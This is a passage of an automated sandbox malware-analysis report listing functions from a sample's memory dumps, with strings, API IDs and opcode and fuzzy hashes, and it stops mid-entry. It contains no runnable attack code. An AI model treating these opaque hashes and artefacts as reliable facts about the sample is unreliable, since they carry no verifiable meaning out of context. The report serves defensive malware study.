                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: 80c39a1b19b760212b36b8ecb11fc4e9f813a7a7e376aae0fcca13b162f17434
                                                  • Instruction ID: 1831306f015621a6cc4e1feebfd37016540f6869e6f494def65dee193fa9c5ec
                                                  • Opcode Fuzzy Hash: 80c39a1b19b760212b36b8ecb11fc4e9f813a7a7e376aae0fcca13b162f17434
                                                  • Instruction Fuzzy Hash: E03160B65093029FD711CF28C880A9BFBF8FB85694F00096EF99683290D634DD088BD2
                                                  Function 35FC33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3600289A
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3600289F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 33e863b1fa03d4720f3e586fa0195d95292fd6cf8c346e9408c703a03a92bc15
                                                  • Instruction ID: 141f32c21dae5ccda695cf38279d19c0a1cb9d51cefd2149a4d443accf5eeb42
                                                  • Opcode Fuzzy Hash: 33e863b1fa03d4720f3e586fa0195d95292fd6cf8c346e9408c703a03a92bc15
                                                  • Instruction Fuzzy Hash: A8110676B05305ABF7158A49CD81F5E7BE8DB84790F1088F9B9049B284DAB4CD008BA4
                                                  Function 36039C98 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 607d65288004b68f4ce910ac02ae8619f742b6bf9b60afd6083c2fe21f9231b0
                                                  • Instruction ID: 8af639a43c715785a99b8ed3ac91f8e84a8cff77c9d4a807a344da8cafbb27af
                                                  • Opcode Fuzzy Hash: 607d65288004b68f4ce910ac02ae8619f742b6bf9b60afd6083c2fe21f9231b0
                                                  • Instruction Fuzzy Hash: 8922E278A067608FE714CF2AC052376BBE1BF45346F6484D9E8C69F285E775D482CB60
                                                  Function 35F91051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ada3364ad46803d92ada850aa4ab971f900a49cf1b81e21a990295653e59cc1b
                                                  • Instruction ID: d2485553395a312c44e6c59ef6185bf86372c2457007d4806c9985573904c667
                                                  • Opcode Fuzzy Hash: ada3364ad46803d92ada850aa4ab971f900a49cf1b81e21a990295653e59cc1b
                                                  • Instruction Fuzzy Hash: 4FB100B56093809FE354CF28C480A5AFBF1BB88344F544D6EE899CB352D771E885CB82
                                                  Function 360155E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ce19a80090e1f6a73cd9ef2736167026cb00e50c92f42db88898c475418034
                                                  • Instruction ID: a4e371063f2946b6918d770bf4ac2a2af1f9494aef71513000a292385f979bce
                                                  • Opcode Fuzzy Hash: 44ce19a80090e1f6a73cd9ef2736167026cb00e50c92f42db88898c475418034
                                                  • Instruction Fuzzy Hash: AE813DB5A00319ABEB12DFE5CC85E9FFBF8EF49750F140569E515AB290DA70E900CB90
                                                  Function 35F97623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 437eafb405ce52565a768a53f9bc664392b103188f3c5a41222f79d1ed82c888
                                                  • Instruction ID: e937cc578756856911c33b337d62347f916ca274d7acbd92866eba03f865f3b9
                                                  • Opcode Fuzzy Hash: 437eafb405ce52565a768a53f9bc664392b103188f3c5a41222f79d1ed82c888
                                                  • Instruction Fuzzy Hash: F5618579B01746AFEB0CDF78C480A9DFBB6BF45344F24896AD519A7300DB30A9518F91
                                                  Function 35F8B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4d625eac9c2809f7760fdd39a45f41f937d92f7d2f638bfbc91617af63822bf8
                                                  • Instruction ID: beb3da653e88b285a6ec01196c621bfbb88c15a9c7f1b94e48888212e0257bab
                                                  • Opcode Fuzzy Hash: 4d625eac9c2809f7760fdd39a45f41f937d92f7d2f638bfbc91617af63822bf8
                                                  • Instruction Fuzzy Hash: 0731FF726002089FC711DF14C881E5A77AAFF45360F114A69ED659F3A2CB31ED42CBD0
                                                  Function 35F956E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 0c8b0aa378c1f84e6991f38bdb20ff5769e9a746f06614d833abd532ab2bbd27
                                                  • Instruction ID: f7cab6926ab977fa1a405438a866d5fec7630776996a1caea174d98601527977
                                                  • Opcode Fuzzy Hash: 0c8b0aa378c1f84e6991f38bdb20ff5769e9a746f06614d833abd532ab2bbd27
                                                  • Instruction Fuzzy Hash: CD318B3A715A05FFE7499B24CE80E99BBAAFF84254F405855E80187E60DB71E930CB81
                                                  Function 35F93536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 446a2d347f8c01b026bb27f841436ecd354266d365fa3285af35aa05e684fd89
                                                  • Instruction ID: 04d635fa93b897302a6b369cd41bc1a727a3658622e02508b7f9df150ff40971
                                                  • Opcode Fuzzy Hash: 446a2d347f8c01b026bb27f841436ecd354266d365fa3285af35aa05e684fd89
                                                  • Instruction Fuzzy Hash: A321F036205A459FE725DF14C984F9ABFB6FF84B11F410899E8464B681CB70EC58CF92
                                                  Function 35FADCD1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eb0908d5322f44d78a6782bcbdd0c5f8faf3077693c86adfa3c9d2f9b48fa7ae
                                                  • Instruction ID: 0632f062bd2f40017a92d19d96bb12a76752b97facdfbb28d8d9bd43ab0cde28
                                                  • Opcode Fuzzy Hash: eb0908d5322f44d78a6782bcbdd0c5f8faf3077693c86adfa3c9d2f9b48fa7ae
                                                  • Instruction Fuzzy Hash: 3F21E4B6704388DFE702DF98C940B9DBBF9FF45744F144899E9009B291CB798900CB22
                                                  Function 35F892AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 1bf6700c086a4bbb01578b8e3f1eb07204cc57ac659a30746b6bf927af388369
                                                  • Instruction ID: f942d6945b20b620fe44f44e8fda2257cb999a72c5fba31d77b2be72895af044
                                                  • Opcode Fuzzy Hash: 1bf6700c086a4bbb01578b8e3f1eb07204cc57ac659a30746b6bf927af388369
                                                  • Instruction Fuzzy Hash: 08F02E32204704ABD731DB09CD04F8BBBFEEF84B00F04091CE94293490C7A0F909CA60
                                                  Function 36019603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2609bb69b08a978478f22bf7f42c8a92f84c7b57da1dccdce15fc070cacc7f3
                                                  • Instruction ID: 99a0d708990eeb8f6ee325df8f1138ed5b89e1ef57f4737996d8290fd4d3649a
                                                  • Opcode Fuzzy Hash: b2609bb69b08a978478f22bf7f42c8a92f84c7b57da1dccdce15fc070cacc7f3
                                                  • Instruction Fuzzy Hash: 95E06572B14208ABEB04DB58D846B4A77EDEB88798F1400A9F50BD7140D660DD01D690
                                                  Function 35CF3781 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680565927.0000000035CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35ce0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 8bea502701765b0e0139d95e0e3463405ea88cfe70d3b3a16cc4769ce9f2389d
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: 6B81D33060CB848FD7A5DB2DC490B6ABBE2BFD8344F504D6DA1DAC3261DA35D941CB52
                                                  Function 05C93781 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93668651185.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_5c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 5e3fcf15e329888bb6e8d9b70e45b28ca1aab9a9982e70066c3d5993c589caaa
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: F681C53060C7848FDBA9DB2DC458B6ABBE2BBC9704F544D6DA1DAC3261DB34D941CB42
                                                  Function 35C93781 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680401460.0000000035C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 35C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 7e997205ca45403e1fd8181287e384fc59b492ae5a2868fccd18f69a3bd5e4a0
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: 8D81B43460CB848FD7A9DB2DC454BAABBE2BFD9704F50496DA1DAC3261DB34D841CB42
                                                  Function 35F9965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction ID: 054c64ec092b67c73646a28bdcfc7e3ee88740575c6b614404abee4e81a0a935
                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction Fuzzy Hash: 2B618CBAD0461DABEB15CFA5C940BDEBBF9FF84750F110919E810B72A0DB758A01CB91
                                                  Function 3601F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction ID: f29d95151236f64d04f1870493e39f272588c594d8c4b1a12e69a37f335665d6
                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction Fuzzy Hash: E151FAB6A04305AFE3228F15C841F6BBBF8FB84754F004969FA4097291DBB4ED04CB92
                                                  Function 36019429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  • Opcode ID: edd72f590905a572c6ac319880c0e8ad6fda127a9dd92882f02c2e5f473bd009
                                                  • Instruction ID: db844707ee24823a0c4bebbe90a1f72f8efb9c03553c5cf578805ff93bfa96e1
                                                  • Opcode Fuzzy Hash: edd72f590905a572c6ac319880c0e8ad6fda127a9dd92882f02c2e5f473bd009
                                                  • Instruction Fuzzy Hash: 113118BDB103019FE714CF59D852B267BE5EB89354F9044AAE686EF381EA318C81C790
                                                  Function 35FC7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction ID: e442bcb4c3cfe7dc128c17ff49d913d1888b9e6f93919c1c8999e87267cef72d
                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction Fuzzy Hash: 7C41A0B6A04616EBEF15CF88C480BBEBBB5FF44741F4048EEE845A7240DB749941CBA1
                                                  Function 35F8FF30 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35F8FFF8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                  • API String ID: 0-996340685
                                                  • Opcode ID: 24a35867623173c397b54bb0e56b326194d0d8b910fe9999c542cfd85d1b0046
                                                  • Instruction ID: 091def7d9572e31f5c53057f8448c19775b0618473cecca3995a5d6c23a3bc7a
                                                  • Opcode Fuzzy Hash: 24a35867623173c397b54bb0e56b326194d0d8b910fe9999c542cfd85d1b0046
                                                  • Instruction Fuzzy Hash: 3E415E75A00B4A9FE728DFA4C440AEBB7F9BF49340F004D2ED5AAC3240E774A645CB95
                                                  Function 35FC360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  • Opcode ID: 4d73e0496facddaf46025b5faf53f4c95b3c1904a441fb1339c2c0e85d771cf1
                                                  • Instruction ID: bbc36d312c417580daf6d11cbfed9e6e0595599f7a8507326d0acb32e6b104e0
                                                  • Opcode Fuzzy Hash: 4d73e0496facddaf46025b5faf53f4c95b3c1904a441fb1339c2c0e85d771cf1
                                                  • Instruction Fuzzy Hash: C841B8B1608302DFE305CF18C080A16FBE5EF89754F5089AEE459CB281DB71C846CB92
                                                  Function 35F896E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 3(w3(w
                                                  • API String ID: 3446177414-3452111426
                                                  • Opcode ID: a7b02732a7a01b3bcf60898f921acc543c7ba425c9eae3d583fcb4693a19fbb5
                                                  • Instruction ID: 48d3970c2e4d5bb385d72c6afdacbe9ee8fd5058ab5482e66b45a8e53fba8714
                                                  • Opcode Fuzzy Hash: a7b02732a7a01b3bcf60898f921acc543c7ba425c9eae3d583fcb4693a19fbb5
                                                  • Instruction Fuzzy Hash: 7021D076A00B18AFC722CF68C940B1E7BB5FB84B50F120C69AA19AB740DB70DD01CBD0
                                                  Function 35FE717A Relevance: .7, Instructions: 705COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f8c387c1c4b31e4405352e317ff4ade597332f127f70b4e229fdd22f778aa8
                                                  • Instruction ID: 2280f5a29091c2769fe23c5feed34134376c5ca65e8c81001e7709f552099c56
                                                  • Opcode Fuzzy Hash: 99f8c387c1c4b31e4405352e317ff4ade597332f127f70b4e229fdd22f778aa8
                                                  • Instruction Fuzzy Hash: 4442C475A056568FDB08CF59C8809AEF7B6FF88354B14895DD952AB380DB34EC42CF90
                                                  Function 35FBB1E0 Relevance: .6, Instructions: 629COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 424ae38fb40daabcd791ebea6389b5f9e43d86d5efcf830fe3cace9ce2984000
                                                  • Instruction ID: 01906a993bb2ad6d276fb71d3a2f7a5fda630f346183082de1ccc5c432fc01fa
                                                  • Opcode Fuzzy Hash: 424ae38fb40daabcd791ebea6389b5f9e43d86d5efcf830fe3cace9ce2984000
                                                  • Instruction Fuzzy Hash: B232D5B6E00219DFDF14CF99C880BAEBBB5FF44744F180569E806AB390E7B59911CB91
                                                  Function 36027CE8 Relevance: .6, Instructions: 617COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6df46805e7f4a2d8465881fada1b68c1dfbbe66ed6b7d338e34888886ce44b1c
                                                  • Instruction ID: 5029c1b1ded57fb2a6bdd333361b7ed68a460ef2f9360769a796d40f5a1b5f60
                                                  • Opcode Fuzzy Hash: 6df46805e7f4a2d8465881fada1b68c1dfbbe66ed6b7d338e34888886ce44b1c
                                                  • Instruction Fuzzy Hash: A8423DB5E002198FEB24CF69C881BADBBF5BF48315F5481D9E849AB241D7349D85CF60
                                                  Function 3605124C Relevance: .6, Instructions: 571COMMON
